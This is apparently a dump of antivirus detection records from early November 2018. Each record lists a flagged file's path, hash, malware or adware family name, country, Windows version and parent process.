  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='3118e7127955afc360a5207455eec2926ff869a8e0326ee19b7b9506a85b3122', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='790e90f56d472cece27d22851f67974daa746ff5dceff0390e2a4ec5067342c3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\790E90F56D472CECE27D22851F67974DAA746FF5DCEFF0390E2A4EC5067342C3', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='790e90f56d472cece27d22851f67974daa746ff5dceff0390e2a4ec5067342c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:06:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081052-2e2b8ad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4ba9138\\AVSCAN-20181101-080926-239269CC\\AVSCAN-20181101-081052-2E2B8AD9', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='285027ecce36b3268e6cc4c35a38588590feab97998294bf518def8038ed6c43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\285027ECCE36B3268E6CC4C35A38588590FEAB97998294BF518DEF8038ED6C43', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='285027ecce36b3268e6cc4c35a38588590feab97998294bf518def8038ed6c43', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fonts.exe', filepath='F:\\New folder\\Corel Content\\Fonts\\Fonts.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa1224.35303\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa1224.35303\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184004-59c54413', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ee2398e\\AVSCAN-20181101-183954-582D926A\\AVSCAN-20181101-184004-59C54413', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:40:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='69b0f5c04b12d3bbabb62464a98b6821d44f5213d738b885f10ff40f4c56808a', metadata=Row(cmdline='-k LocalServiceNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:24:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30B74A05D543886BCF20296CCD1C030D2E825381D1249C594E291DF91188C233', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:07:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\GUMCB99.tmp\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='02bc3a94bf9e67a400a411f3c73528434ca4b108546dcd34e4978e4288da2124', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0005425.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0005425.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:16:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='279774c6cc63bca2b84866504d2055b74c70a3f367545a326288139f59baf641', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\279774C6CC63BCA2B84866504D2055B74C70A3F367545A326288139F59BAF641', filesize=1740000, name='TR/ATRAPS.Gen2.#M300.#R100252'), hash='279774c6cc63bca2b84866504d2055b74c70a3f367545a326288139f59baf641', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:08:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir000', filepath='\\\\?\\C:\\Applications\\Service.VIR000', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='testo decreto.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO\\L.812008\\testo decreto.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0330985.exe', filepath='e:\\system volume information\\_restore{64f1701b-39b4-4c9e-b329-c1179e2aa913}\\rp65\\A0330985.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\oxvoyrfouue\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T14:44:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150732-e2ff730a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150732-E2FF730A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:07:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b8a0965df696458205b59efc1005088b4cc2508c68744f2d4d98a7869d875a8c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B8A0965DF696458205B59EFC1005088B4CC2508C68744F2D4D98A7869D875A8C', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='b8a0965df696458205b59efc1005088b4cc2508c68744f2d4d98a7869d875a8c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\ANCIENPC\\C\\Program Files\\File Recovery\\undelete360\\unins000.exe', filesize=784000, name='W32/Sality.AT.#M1.#R1'), hash='d5ee8229a137c303b23ba143a490bb48d12f62f7f5b01c6ef269555c75f5e2c6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zQpazfJNQEuD1LcM.1', country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093549-9b518933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093549-9B518933', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150248-ac82d0a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150248-AC82D0A8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213202-359c6efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213202-359C6EFE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a47aeae2f0881fbc559f52e025bae72ebf87781ce90d503ab3a2ba47685e6e92', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\A47AEAE2F0881FBC559F52E025BAE72EBF87781CE90D503AB3A2BA47685E6E92', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a47aeae2f0881fbc559f52e025bae72ebf87781ce90d503ab3a2ba47685e6e92', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files (x86)\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:27:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\wzliuxz4izr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder.scr', filepath='E:\\New Folder.scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152800-ce5dfb62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152800-CE5DFB62', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095356-6ba39065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095356-6BA39065', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libri italiano.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\libri italiano.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alimentari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\qtrdsbwlnsy\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:40:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\wqp44vjzhlh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541022074.5bda217a515ec', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\402281976.exe', parentsize=671232, timestamp='2018-11-01T10:08:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000243d9', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243d9', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:48:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\Shaan\\AppData\\Local\\Temp\\tmp1605323\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='8', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:13:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:31:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='client.exe', filepath='C:\\Program Files\\Borland\\Delphi7\\Projects\\Тест сервера\\Client\\client.exe', filesize=384000, name='HEUR/AGEN.1018385.#M1.#R1'), hash='247ff1a1c61a31ef97c49b6ee93dd9b2f2fbdd0c2ebd69a4b76b0945183e783a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0f47aae6667a49b86c418a82c0989ad0.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1754387442\\0f47aae6667a49b86c418a82c0989ad0.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='008ded23f8a29747ecaa0f0f2336defb0c209bc28b9875418b88f9a352bf92b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T19:33:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:30:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kinit.exe', filepath='\\\\?\\F:\\Program Files\\Java\\jre6\\bin\\kinit.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='ab257ba57ad491fd1817addd8392e913d929e398ddfb850bd7b4e60a1ff85b7c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:50:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3579093\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-04T23:09:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152353-386e48cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41b110e3\\AVSCAN-20181104-152341-3633E2F7\\AVSCAN-20181104-152353-386E48CF', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ab7ff086162a1524755709db2fe64c6b59f5f020ab48a85921fe9b9500dadadc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135121-2f8c843e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135121-2F8C843E', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151925-c83863e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-151925-C83863E4', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:17:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ghosthouse[1].htm', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\IE\\0C0EA4J3\\ghosthouse[1].htm', filesize=28000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='791f8f05505d197b2913104c716adfa3a4faa46591e05845ef3e535b415a405d', metadata=Row(cmdline='SCODEF:68548 CREDAT:267521 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=817296, timestamp='2018-11-04T11:38:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-photofiltre-en-653.exe', filepath='C:\\Users\\X\\Downloads\\Downloader-fuer-photofiltre-en-653.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='691faa6a61afde1cc8407028fbac875ff3501d10b2effd63df0026cd060f3d5c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:32:35Z'), dt=datetime.date(2018, 11, 4)),
